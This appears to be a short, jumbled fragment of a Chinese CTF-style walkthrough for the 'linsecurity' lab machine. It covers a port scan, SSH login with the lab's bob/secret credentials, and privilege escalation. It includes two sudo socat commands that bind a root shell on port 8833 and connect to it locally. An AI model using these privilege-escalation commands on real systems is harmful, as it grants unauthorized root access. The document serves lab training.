目录
4.利用ss-manager远程代码执行漏洞切换到fireman用户漏洞参考链接
linsecurity-1,244
1.端口扫描
2.连接ssh
根据靶机提示,登录bob/secret账号
3.1使用socat提权
sudo socat tcp-listen:8833,reuseaddr,fork exec:sh,pty,stderr,setsid,sigint,sane
socat FILE:`tty`,raw,echo=0 TCP:127.0.0.1:8833
3.2sudo执行ash提权